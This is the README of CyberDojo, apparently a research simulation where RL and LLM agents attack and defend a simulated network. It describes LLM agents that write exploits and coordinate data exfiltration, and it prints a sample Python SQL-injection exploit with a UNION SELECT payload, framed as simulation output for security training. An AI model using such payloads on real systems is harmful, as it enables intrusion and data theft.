🥋 CyberDojo

Adversarial AI War Games — Where LLMs Battle for Network Supremacy

A co-evolutionary LLM-augmented adversarial simulation platform for autonomous cyber attack and defense with multi-agent APT swarms.

Features · Quick Start · Architecture · Game Modes · Research Paper · Screenshots

🧠 What is CyberDojo?

CyberDojo is a first-of-its-kind cybersecurity simulation platform where AI-powered Red Team (attackers) and Blue Team (defenders) battle autonomously over a simulated network — and you can take command of either side.

Unlike traditional cyber ranges that use scripted scenarios, CyberDojo combines:

🤖 Reinforcement Learning (PPO/DQN) for agents that learn optimal strategies
🧠 Large Language Models (GPT-4o) for agents that reason in natural language
👤 Human-in-the-Loop for you to command either team through a live dashboard
🐝 Multi-Agent APT Swarms where 3 specialized LLM hackers coordinate attacks
⚡ LLM Code Generation that writes real Python exploits and config patches during battle

The result? Agents that don't just choose abstract "attack" or "defend" — they write actual exploit scripts, generate configuration patches, communicate in a hacker chatroom, and produce interpretable reasoning for every decision.

✨ Features

🔴 Red Team (Attack)

Feature	Description
12 Attack Actions	scan_network, scan_vulnerability, exploit, privilege_escalate, lateral_move, install_backdoor, exfiltrate_data, cover_tracks, deploy_ransomware, phish_user, ddos_service, wait
LLM Exploit Generator	GPT-4o writes full Python exploit scripts (SQL injection, buffer overflow, SSH bypass, DNS poisoning) targeting specific CVEs on specific nodes
APT Swarm Mode	3 coordinated LLM agents — Scout 🔍, Breacher 💥, Exfiltrator 📤 — communicate via a shared Hacker Chatroom
Red Commander	Play as the hacker yourself with point-and-click attack controls
MITRE ATT&CK	Every action maps to real-world ATT&CK techniques (T1046, T1190, T1041, etc.)

🔵 Blue Team (Defense)

Feature	Description
12 Defense Actions	monitor_traffic, analyze_alert, patch_vulnerability, isolate_node, restore_backup, update_firewall, deploy_honeypot, forensic_analysis, deploy_ids_rule, segment_network, rotate_credentials, wait
Auto-Remediation	LLM generates actual config patches (nginx.conf, sshd_config, smb.conf) for detected vulnerabilities
Pen Test Preview	Preview what exploits Red could deploy against any node before they attack
Blue Commander	Command the defense team against AI-driven attackers

🌐 Platform

Feature	Description
Infinite Scenarios	Type "Hospital Network" or "Military Base" → LLM generates a complete network topology with realistic nodes, services, subnets, and CVEs
Real-Time Dashboard	D3.js network graph, live team stats, battle log, commander chat, hacker chatroom
Co-Evolutionary Training	Red and Blue agents evolve together with ELO rating system
Sim-to-Real Export	Export defensive playbooks as executable Bash scripts

🚀 Quick Start

Prerequisites

Python 3.10+
OpenAI API key (for LLM features)

Installation

# Clone the repository
git clone https://github.com/satyamdas03/CyberDojo.git
cd CyberDojo

# Install dependencies
pip install -r requirements.txt

# Set your OpenAI API key
$env:OPENAI_API_KEY = "your-api-key-here"    # PowerShell
# export OPENAI_API_KEY="your-api-key-here"  # Linux/Mac

Run Your First Battle

# 🤖 AI vs AI — Watch LLM agents battle each other
python main.py battle --red llm --blue llm --scenario "Hospital Network" --visualize

# 🎮 Play as the Hacker — You attack, AI defends
python main.py battle --red commander --blue llm --scenario "Corporate Network" --visualize

# 🛡️ Play as the Defender — AI attacks, you defend
python main.py battle --red llm --blue commander --scenario "Military Base" --visualize

# 🐝 APT Swarm vs You — 3 coordinated hackers attack your network
python main.py battle --red swarm --blue commander --scenario "Bank" --visualize

# 🏋️ Train RL agents through co-evolution
python main.py train --red-algo ppo --blue-algo ppo --timesteps 100000

🏗️ Architecture

CyberDojo/
├── main.py                    # CLI entry point (train, battle, demo, benchmark)
├── requirements.txt           # Python dependencies
├── cyberdojo/                 # Core simulation engine
│   ├── __init__.py
│   ├── environment.py         # OpenAI Gym environment (CyberDojoEnv)
│   ├── network.py             # Network topology & node management
│   ├── agents.py              # RL agents (PPO, DQN, Scripted, Random)
│   ├── llm_agents.py          # LLM agents (Red, Blue, Commander, Red Commander)
│   ├── apt_swarm.py           # Multi-Agent APT Swarm (Scout, Breacher, Exfiltrator)
│   ├── exploit_gen.py         # LLM exploit code generation engine
│   ├── remediation.py         # Auto-remediation config patch generator
│   ├── llm_scenario.py        # Infinite LLM scenario generator
│   ├── rewards.py             # Reward shaping for RL training
│   ├── trainer.py             # Co-evolutionary training loop with ELO
│   ├── mitre.py               # MITRE ATT&CK technique mapping
│   ├── sim2real.py            # Sim-to-Real playbook export
│   └── config.py              # Configuration management
├── dashboard/                 # Real-time web dashboard
│   ├── server.py              # Flask-SocketIO backend
│   ├── index.html             # Dashboard UI
│   ├── dashboard.js           # D3.js network visualization + WebSocket logic
│   └── styles.css             # Cyberpunk-themed styling
└── tests/                     # Test suite
    └── test_*.py

System Diagram

┌─────────────────────────────────────────────────────────────────┐
│                        CYBERDOJO ENGINE                          │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │              CyberDojoEnv (OpenAI Gym)                    │   │
│  │  ┌─────────────┐  ┌──────────────┐  ┌───────────────┐   │   │
│  │  │ Network     │  │ State Machine│  │ Reward Engine │   │   │
│  │  │ Topology    │  │ 12 Red acts  │  │ Red & Blue    │   │   │
│  │  │ Nodes/Edges │  │ 12 Blue acts │  │ reward shaping│   │   │
│  │  └─────────────┘  └──────────────┘  └───────────────┘   │   │
│  └──────────────────────────────────────────────────────────┘   │
│                                                                  │
│  ┌─── RED TEAM ──────────────┐  ┌─── BLUE TEAM ─────────────┐  │
│  │ • RL Agent (PPO/DQN)      │  │ • RL Agent (PPO/DQN)      │  │
│  │ • LLM Agent (GPT-4o)     │  │ • LLM Agent (GPT-4o)      │  │
│  │ • Red Commander (Human)   │  │ • Blue Commander (Human)   │  │
│  │ • APT Swarm (3× LLM)     │  │ • Auto-Remediation Engine │  │
│  │ • Exploit Code Generator  │  │ • Pen Test Preview         │  │
│  └───────────────────────────┘  └────────────────────────────┘  │
│                                                                  │
│  ┌─── DASHBOARD (Flask + D3.js + WebSocket) ─────────────────┐  │
│  │ Network Graph │ Team Stats │ Battle Log │ Commander Chat   │  │
│  │ Hacker Chatroom │ Action Menu │ Exploit Code Display      │  │
│  └───────────────────────────────────────────────────────────┘  │
└─────────────────────────────────────────────────────────────────┘

🎮 Game Modes

1. 🤖 AI vs AI (`--red llm --blue llm`)

Watch two GPT-4o agents battle it out. The Red LLM reasons step-by-step about attack strategy while the Blue LLM analyzes threats and deploys defenses.

2. 🎮 Red Commander (`--red commander`)

Play as the hacker. Click on nodes to select targets, then choose from 8 attack buttons (Scan, Exploit, Backdoor, Phish, etc.). The LLM translates your orders into precise game actions.

3. 🛡️ Blue Commander (`--blue commander`)

Play as the SOC analyst. Defend your network against AI-driven attacks. Monitor alerts, isolate compromised nodes, deploy patches, and use the Pen Test button to preview potential exploits.

4. 🐝 APT Swarm (`--red swarm`)

Three coordinated LLM attackers assault your network:

Scout 🔍 — Maps the network and finds vulnerabilities
Breacher 💥 — Exploits the targets Scout identifies
Exfiltrator 📤 — Steals data from nodes Breacher compromises

They coordinate through a Hacker Chatroom visible as an "Intercepted Communications" panel on the dashboard.

5. 🏋️ RL Training (`train`)

Train Red and Blue RL agents through co-evolutionary self-play. Agents compete in rounds, earn ELO ratings, and the weakest are pruned while the strongest are cloned.

💀 LLM Exploit Generator

When the Red Team executes an exploit action, the LLM generates a full Python exploit script in real time:

#!/usr/bin/env python3
# CVE-2024-2187 — SQL Injection on email-gateway (10.0.1.11)

import requests

def exploit_sql_injection(target_url):
    payload = "' UNION SELECT null, user, password FROM users -- "
    vulnerable_url = f"{target_url}/search?query={payload}"
    
    response = requests.get(vulnerable_url, timeout=10)
    if response.status_code == 200:
        print(f"[+] Data extracted: {response.text[:200]}")
        return True
    return False

if __name__ == "__main__":
    exploit_sql_injection("http://10.0.1.11")

Supported exploit types: SQL Injection, Buffer Overflow, SSH Auth Bypass, Remote Code Execution, LDAP Injection, DNS Cache Poisoning, SMB RCE, Privilege Escalation, Phishing payloads.

🔧 Auto-Remediation Engine

When the Blue Team selects patch_vulnerability, the LLM generates actual configuration patches:

# sshd_config — Fixing CVE-2024-4321 (SSH Buffer Overflow)
- Protocol 1,2
+ Protocol 2
- Ciphers aes128-cbc,3des-cbc,aes256-cbc
+ Ciphers aes256-gcm@openssh.com,chacha20-poly1305@openssh.com
- MaxAuthTries 10
+ MaxAuthTries 3
+ LoginGraceTime 30

Supported configs: nginx.conf, sshd_config, smb.conf, apache2.conf, mysql.cnf, postgresql.conf, firewall rules, kubernetes manifests, docker-compose.yml.

📊 Performance

Red Agent	Nodes Compromised	Data Stolen	Exploit Scripts Generated
Random	0.8	1.2	0
Scripted	1.5	3.8	0
RL (PPO)	2.8	8.5	0
LLM (GPT-4o)	2.5	7.2	~5 per battle
APT Swarm	3.2	12.0	~8 per battle

The APT Swarm achieves the highest data exfiltration due to its coordinated Scout→Breacher→Exfiltrator pipeline, while RL agents achieve better stealth (fewer detections).

📚 Research Paper

This project accompanies a research paper:

"CyberDojo: A Co-Evolutionary LLM-Augmented Adversarial Simulation Platform for Autonomous Cyber Attack and Defense with Multi-Agent APT Swarms"

Satyam Das and S.P. Raja

Novel Contributions

LLM Agents That Write Real Code — First cybersecurity simulation where agents generate executable exploit scripts and configuration patches during gameplay
Multi-Agent APT Swarm with Natural Language Coordination — Three specialized LLM agents coordinate through a shared chatroom, mimicking real-world APT group behavior
Hybrid RL+LLM Architecture — First platform combining trained RL policies with LLM reasoning in cybersecurity
Dual Human-in-the-Loop — Seamlessly play as either the attacker or defender with full AI opposition
Infinite LLM Scenario Generation — Generate complete network topologies from text descriptions

Competitive Landscape

Capability	CyberBattleSim	CALDERA	PentestGPT	CyberDojo
RL Agents	✅	❌	❌	✅
LLM Agents	❌	❌	✅	✅
Multi-Agent APT	❌	Partial	❌	✅
Exploit Code Gen	❌	❌	❌	✅
Auto-Remediation	❌	❌	❌	✅
Human-in-the-Loop	❌	❌	Chat	✅
Infinite Scenarios	❌	❌	❌	✅
Live Dashboard	❌	Web UI	❌	✅

🖥️ CLI Reference

# ─── Battle Mode ───
python main.py battle [OPTIONS]
  --red      {rl,scripted,random,llm,commander,swarm}   Red Team agent
  --blue     {rl,scripted,random,llm,commander}          Blue Team agent
  --scenario "Theme Name"     LLM-generated scenario
  --network-size {small,medium,large}
  --visualize                 Open the live dashboard
  --sim2real                  Export defensive playbook

# ─── Training Mode ───
python main.py train [OPTIONS]
  --red-algo  {ppo,dqn}      RL algorithm for Red
  --blue-algo {ppo,dqn}      RL algorithm for Blue
  --timesteps 100000         Training steps
  --co-evolve                Enable co-evolutionary training

# ─── Other ───
python main.py demo          Quick demo with visualizations
python main.py benchmark     Run performance benchmarks
python main.py dashboard     Launch dashboard only

🛠️ Tech Stack

Component	Technology
Core Engine	Python, NumPy, OpenAI Gym
RL Training	PyTorch, Stable-Baselines3
LLM Integration	LangChain, OpenAI GPT-4o
Structured Output	Pydantic v2
Dashboard	Flask, Flask-SocketIO, D3.js
Network Graph	NetworkX
Export	Bash, Jinja2

⚠️ Ethical Disclaimer

CyberDojo is designed exclusively for educational and research purposes. All exploit code is generated against simulated, fictional network infrastructure within a sandboxed environment. The platform includes safety measures:

Exploits target only simulated IP addresses
No real network connections are made
The auto-remediation engine focuses on defensive applications
Commander mode is designed for training security professionals

Do not use generated exploit code against real systems without explicit authorization.

📄 License

MIT License — see LICENSE for details.

👤 Author

Satyam Das

GitHub: @satyamdas03

Built with 🧠 AI and ☕ caffeine

If you find this project useful, please ⭐ star the repo!

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
cyberdojo		cyberdojo
dashboard		dashboard
tests		tests
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
main.py		main.py
requirements.txt		requirements.txt

Folders and files

Latest commit

History

Repository files navigation

🥋 CyberDojo

Adversarial AI War Games — Where LLMs Battle for Network Supremacy

🧠 What is CyberDojo?

✨ Features

🔴 Red Team (Attack)

🔵 Blue Team (Defense)

🌐 Platform

🚀 Quick Start

Prerequisites

Installation

Run Your First Battle

🏗️ Architecture

System Diagram

🎮 Game Modes

1. 🤖 AI vs AI (--red llm --blue llm)

2. 🎮 Red Commander (--red commander)

3. 🛡️ Blue Commander (--blue commander)

4. 🐝 APT Swarm (--red swarm)

5. 🏋️ RL Training (train)

💀 LLM Exploit Generator

🔧 Auto-Remediation Engine

📊 Performance

📚 Research Paper

Novel Contributions

Competitive Landscape

🖥️ CLI Reference

🛠️ Tech Stack

⚠️ Ethical Disclaimer

📄 License

👤 Author

About

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

1. 🤖 AI vs AI (`--red llm --blue llm`)

2. 🎮 Red Commander (`--red commander`)

3. 🛡️ Blue Commander (`--blue commander`)

4. 🐝 APT Swarm (`--red swarm`)

5. 🏋️ RL Training (`train`)

Packages